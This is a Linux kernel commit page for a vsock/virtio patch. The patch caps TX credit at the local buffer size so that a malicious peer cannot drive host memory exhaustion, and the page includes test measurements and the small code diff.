Linux kernel mirror (for testing) git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
kernel os linux

vsock/virtio: cap TX credit to local buffer size

The virtio transports derives its TX credit directly from peer_buf_alloc,
which is set from the remote endpoint's SO_VM_SOCKETS_BUFFER_SIZE value.

On the host side this means that the amount of data we are willing to
queue for a connection is scaled by a guest-chosen buffer size, rather
than the host's own vsock configuration. A malicious guest can advertise
a large buffer and read slowly, causing the host to allocate a
correspondingly large amount of sk_buff memory.
The same thing would happen in the guest with a malicious host, since
virtio transports share the same code base.

Introduce a small helper, virtio_transport_tx_buf_size(), that
returns min(peer_buf_alloc, buf_alloc), and use it wherever we consume
peer_buf_alloc.

This ensures the effective TX window is bounded by both the peer's
advertised buffer and our own buf_alloc (already clamped to
buffer_max_size via SO_VM_SOCKETS_BUFFER_MAX_SIZE), so a remote peer
cannot force the other to queue more data than allowed by its own
vsock settings.

On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with
32 guest vsock connections advertising 2 GiB each and reading slowly
drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only
recovered after killing the QEMU process. That said, if QEMU memory is
limited with cgroups, the maximum memory used will be limited.

With this patch applied:

Before:
MemFree: ~61.6 GiB
Slab: ~142 MiB
SUnreclaim: ~117 MiB

After 32 high-credit connections:
MemFree: ~61.5 GiB
Slab: ~178 MiB
SUnreclaim: ~152 MiB

Only ~35 MiB increase in Slab/SUnreclaim, no host OOM, and the guest
remains responsive.

Compatibility with non-virtio transports:

- VMCI uses the AF_VSOCK buffer knobs to size its queue pairs per
socket based on the local vsk->buffer_* values; the remote side
cannot enlarge those queues beyond what the local endpoint
configured.

- Hyper-V's vsock transport uses fixed-size VMBus ring buffers and
an MTU bound; there is no peer-controlled credit field comparable
to peer_buf_alloc, and the remote endpoint cannot drive in-flight
kernel memory above those ring sizes.

- The loopback path reuses virtio_transport_common.c, so it
naturally follows the same semantics as the virtio transport.

This change is limited to virtio_transport_common.c and thus affects
virtio-vsock, vhost-vsock, and loopback, bringing them in line with the
"remote window intersected with local policy" behaviour that VMCI and
Hyper-V already effectively have.

Fixes: 06a8fc78367d ("VSOCK: Introduce virtio_vsock_common.ko")
Suggested-by: Stefano Garzarella <sgarzare@redhat.com>
Signed-off-by: Melbin K Mathew <mlbnkm1@gmail.com>
[Stefano: small adjustments after changing the previous patch]
[Stefano: tweak the commit message]
Signed-off-by: Stefano Garzarella <sgarzare@redhat.com>
Reviewed-by: Luigi Leonardi <leonardi@redhat.com>
Link: https://patch.msgid.link/20260121093628.9941-4-sgarzare@redhat.com
Acked-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>

authored by

Melbin K Mathew and committed by
Paolo Abeni
8ee784fd 0a98de80

+12 -2
+12 -2
net/vmw_vsock/virtio_transport_common.c
··· 821 821 } 822 822 EXPORT_SYMBOL_GPL(virtio_transport_seqpacket_dequeue); 823 823 824 + static u32 virtio_transport_tx_buf_size(struct virtio_vsock_sock *vvs) 825 + { 826 + /* The peer advertises its receive buffer via peer_buf_alloc, but we 827 + * cap it to our local buf_alloc so a remote peer cannot force us to 828 + * queue more data than our own buffer configuration allows. 829 + */ 830 + return min(vvs->peer_buf_alloc, vvs->buf_alloc); 831 + } 832 + 824 833 int 825 834 virtio_transport_seqpacket_enqueue(struct vsock_sock *vsk, 826 835 struct msghdr *msg, ··· 839 830 840 831 spin_lock_bh(&vvs->tx_lock); 841 832 842 - if (len > vvs->peer_buf_alloc) { 833 + if (len > virtio_transport_tx_buf_size(vvs)) { 843 834 spin_unlock_bh(&vvs->tx_lock); 844 835 return -EMSGSIZE; 845 836 } ··· 893 884 * we have bytes in flight (tx_cnt - peer_fwd_cnt), the subtraction 894 885 * does not underflow. 895 886 */ 896 - bytes = (s64)vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt); 887 + bytes = (s64)virtio_transport_tx_buf_size(vvs) - 888 + (vvs->tx_cnt - vvs->peer_fwd_cnt); 897 889 if (bytes < 0) 898 890 bytes = 0; 899 891